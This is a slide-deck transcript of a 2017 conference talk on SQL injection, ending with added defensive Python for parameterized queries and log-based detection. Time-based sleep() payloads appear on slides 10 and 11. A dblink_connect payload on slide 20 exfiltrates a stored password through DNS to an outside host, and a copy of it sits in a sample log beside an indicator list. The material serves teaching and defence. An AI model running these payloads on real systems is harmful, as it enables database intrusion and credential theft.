Out-of-band SQL Injection Attacks (#cypsec'17)
Cyprus Cyber Security Conference, Out-of-band SQL Injection Attacks, cypsec.org

  1. Out-of-band SQL Injection Attacks. Cyprus Cyber Security Conference, #CypSec’17. Omer Citak, May 2017
  2. whoami: Security Researcher @ Netsparker Ltd.; Developer @ Another Times; Writer @ Ethical Hacking “Offensive & Defensive” book; Blog: omercitak.com; all social platforms: @Om3rCitak
  3. sql injection: Inband (Error Based); Indirect Inference (Boolean Based; Blind, Time Based); Out-of-band (Blind, HTTP/DNS)
  4. sql injection: Inband > Error Based
       ....
       ini_set('display_errors', 'On');
       error_reporting(E_ALL);
       $sql = "SELECT * FROM users WHERE username like '%".$_GET["username"]."%'";
       $results = mysql_query($sql);
       ...
  5. sql injection: Inband > Error Based
  6. sql injection: Indirect Inference > Boolean Based
       ....
       ini_set('display_errors', 'Off');
       error_reporting(~E_ALL);
       $sql = "SELECT * FROM users WHERE username like '%".$_GET["username"]."%'";
       $results = mysql_query($sql);
       $row_count = mysql_num_rows($results);
       if($row_count > 0) echo 'user exist'; else echo 'user not exist';
       ...
  7. sql injection: Indirect Inference > Boolean Based
  8. sql injection: Indirect Inference > Blind (Time Based)
       ....
       ini_set('display_errors', 'Off');
       error_reporting(~E_ALL);
       $sql = "SELECT * FROM users WHERE username like '%".$_GET["username"]."%'";
       $results = mysql_query($sql);
       ...
  9. sql injection: Indirect Inference > Blind (Time Based)
  10. sql injection: Indirect Inference > Blind (Time Based)
       payload> ay' and if(substring(user(),1,1) = 'r', sleep(3), false) --
  11. sql injection: Indirect Inference > Blind (Time Based)
       payload> ay' and if(substring(user(),1,1) = 'a', sleep(3), false) --
  12. sql injection: Out-of-band > Blind (HTTP, DNS)
       ....
       ini_set('display_errors', 'Off');
       error_reporting(~E_ALL);
       $sql = "SELECT * FROM users WHERE (username like '%".$_GET["param"]."%')";
       $results = pg_query($sql);
       ...
  13. demo, dependencies: 1 DNS server => 207.154.221.107 (Ubuntu 16, SpiderLabs Responder); 1 app & database server => 46.101.229.160 (Ubuntu 16, PHP 7, PostgreSQL 9.5); and 1 attacker machine
  14. demo: SELECT * FROM users WHERE (username like '%".$_GET["param"]."%')
  15. demo: SELECT * FROM users WHERE (username like '% '||'test'||'%')
  16. demo: SELECT * FROM users WHERE (username like '% '|| cast(test as numeric) ||'%')
  17. demo: SELECT * FROM users WHERE (username like '% '|| cast(SELECT(test) as numeric) ||'%')
  18. demo: SELECT * FROM users WHERE (username like '% '|| cast(SELECT(dblink_connect()) as numeric) ||'%')
  19. demo: SELECT * FROM users WHERE (username like '% '|| cast(SELECT(dblink_connect('host=test.omercitak.net user=a password=a connect_timeout=2')) as numeric) ||'%')
  20. demo: SELECT * FROM users WHERE (username like '% '|| cast(SELECT(dblink_connect('host='||(select password from users where id=7)||'.omercitak.net user=a password=a connect_timeout=2')) as numeric) ||'%')
  21. demo
  22. where is the guvenlik?
  23. thanks. www.omercitak.com, all social platforms: @Om3rCitak
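The vulnerable pattern that every slide builds on is the `LIKE '%" . $_GET["param"] . "%'` concatenation. The block below is an added example, not code from the slides or from the speaker: it rebuilds that pattern in Python on an in-memory SQLite database (table name, column names and rows are constructed) next to the parameterized form that fixes it. SQLite shares PostgreSQL's `||` concatenation operator, so the `'||'test'||'` probe from slide 15 behaves the same way; SQLite has no `dblink`, so the slide 18 shape produces an engine error instead of a connection, which is still the difference that matters between the two query builders.

```python
import sqlite3

# Added example (not from the slides): the slides' vulnerable PHP pattern
#   "SELECT * FROM users WHERE (username like '%" . $_GET["param"] . "%')"
# rebuilt in Python on an in-memory SQLite database, next to the parameterized
# form that fixes it. Table layout and rows are constructed sample data.


def make_db():
    """Create an in-memory users table with constructed sample rows."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT)")
    conn.executemany(
        "INSERT INTO users (username, password) VALUES (?, ?)",
        [("alice", "s3cret"), ("bob", "hunter2"), ("carol", "pa55w0rd")],  # constructed data
    )
    return conn


def search_vulnerable(conn, param):
    """The slides' pattern: user input spliced straight into the SQL text."""
    sql = "SELECT username FROM users WHERE (username LIKE '%" + param + "%') ORDER BY id"
    return [row[0] for row in conn.execute(sql)]


def search_parameterized(conn, param):
    """Fixed form: the input travels as a bound value, never as SQL text.
    The wildcard wrapping is done inside SQL with '||', so the LIKE pattern is
    still assembled by the engine rather than by string formatting."""
    sql = "SELECT username FROM users WHERE (username LIKE '%' || ? || '%') ORDER BY id"
    return [row[0] for row in conn.execute(sql, (param,))]


def probe_vulnerable(conn, param):
    """Run the vulnerable search and return either its rows or the engine's error
    text. An error here means the input reached the SQL parser as code, which is
    the condition the slides' '||' probes (slides 15 to 18) establish."""
    try:
        return search_vulnerable(conn, param)
    except sqlite3.OperationalError as exc:
        return "engine error: " + str(exc)


if __name__ == "__main__":
    db = make_db()
    # Slide 15's probe: the engine concatenates '%' || 'ali' || '%' into the pattern.
    print(probe_vulnerable(db, "'||'ali'||'"))        # ['alice']
    print(search_parameterized(db, "'||'ali'||'"))    # []  (searched as a literal string)
    # Slide 18's shape: the function call is parsed as SQL. SQLite has no dblink,
    # so it reports "no such function"; the parameterized form never parses it.
    print(probe_vulnerable(db, "'||cast(dblink_connect('x') as numeric)||'"))
    print(search_parameterized(db, "'||cast(dblink_connect('x') as numeric)||'"))  # []
```

One caveat the parameterized form does not remove: the bound value may still contain `%` and `_`, so a caller can widen the match with wildcards. If that matters, escape those two characters in the value and add an `ESCAPE` clause to the `LIKE`.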
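Slide 22 asks where the security was in the demo. Two places a defender can see this class of attack are the database's statement log and the resolver's query log: the time-based payloads (slides 10 and 11) call `sleep()`, and the out-of-band payload (slide 20) calls `dblink_connect()` and then makes the database host resolve a name whose leftmost label is the stolen value. The block below is an added example, not code from the slides or from the speaker; every log line in it is constructed, and the IP addresses, domain names, allowlist and log field layout are assumptions.

```python
# Added example (not from the slides): two detection checks over ordinary logs
# for the time-based and out-of-band techniques shown in the talk. All log
# lines are constructed samples; addresses, domains and layouts are assumptions.

# SQL functions whose presence in application-issued statements is a strong
# indicator of time-based or out-of-band injection. pg_sleep( is listed before
# sleep( so the more specific name is the one reported.
OOB_INDICATORS = ("dblink_connect(", "dblink(", "pg_sleep(", "sleep(", "benchmark(")

# Constructed PostgreSQL log excerpt with log_statement = 'all' (a real
# log_line_prefix would put a timestamp and pid in front of each line).
SAMPLE_PG_LOG = """\
LOG:  statement: SELECT * FROM users WHERE (username like '%ali%')
LOG:  statement: SELECT * FROM users WHERE (username like '%'|| cast((select dblink_connect('host='||(select password from users where id=7)||'.lookup.example user=a password=a connect_timeout=2')) as numeric) ||'%')
LOG:  statement: SELECT * FROM users WHERE (username like '%bob%')
LOG:  statement: SELECT * FROM users WHERE (username like '%x' and (select count(*) from pg_sleep(3)) = 1 --%')
"""


def flag_sql_statements(log_text):
    """Return (line_number, indicator) for each logged statement that calls one of
    the indicator functions. A case-insensitive substring test is deliberately
    simple: an application legitimately issuing these calls is rare enough that
    every hit deserves a look."""
    hits = []
    for lineno, line in enumerate(log_text.splitlines(), 1):
        low = line.lower()
        for indicator in OOB_INDICATORS:
            if indicator in low:
                hits.append((lineno, indicator.rstrip("(")))
                break
    return hits


# Constructed resolver query log, one query per line:
#   "<timestamp> <client_ip> <qtype> <qname>"
DB_SERVER_IPS = {"10.0.0.20"}                                # assumed app/database host
DNS_ALLOWLIST = {"updates.example.com", "ntp.example.com"}  # assumed legitimate lookups

SAMPLE_DNS_LOG = """\
2017-05-10T10:12:01Z 10.0.0.20 A updates.example.com
2017-05-10T10:12:03Z 10.0.0.20 A dbpass1234.lookup.example
2017-05-10T10:12:05Z 10.0.0.55 A www.example.org
2017-05-10T10:12:06Z 10.0.0.20 AAAA ntp.example.com.
"""


def flag_db_host_lookups(log_text, db_hosts=DB_SERVER_IPS, allow=DNS_ALLOWLIST):
    """Flag every DNS query a database host makes for a name outside its allowlist.
    A database server has almost no legitimate reason to resolve arbitrary names,
    and in the dblink technique the leftmost label is the exfiltrated value, so
    each hit is returned as (client, qname, leftmost_label) for the analyst."""
    flagged = []
    for line in log_text.splitlines():
        fields = line.split()
        if len(fields) != 4:
            continue  # skip malformed lines rather than abort the sweep
        _ts, client, _qtype, qname = fields
        qname = qname.rstrip(".").lower()  # normalise trailing dot and case
        if client in db_hosts and qname not in allow:
            flagged.append((client, qname, qname.split(".")[0]))
    return flagged


if __name__ == "__main__":
    for lineno, name in flag_sql_statements(SAMPLE_PG_LOG):
        print(f"statement log line {lineno}: suspicious call to {name}()")
    for client, qname, label in flag_db_host_lookups(SAMPLE_DNS_LOG):
        print(f"db host {client} resolved {qname}; leftmost label {label!r} may be leaked data")
```

The DNS check is the more robust of the two because it does not depend on recognising the payload: any resolver traffic from a host that should not be making lookups is worth an alert, and blocking outbound DNS and TCP from the database server (other than to the systems it genuinely needs) closes the channel the demo relies on. Removing the `dblink` extension where it is not used, and running the application's database role without the right to call it, removes the primitive altogether.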
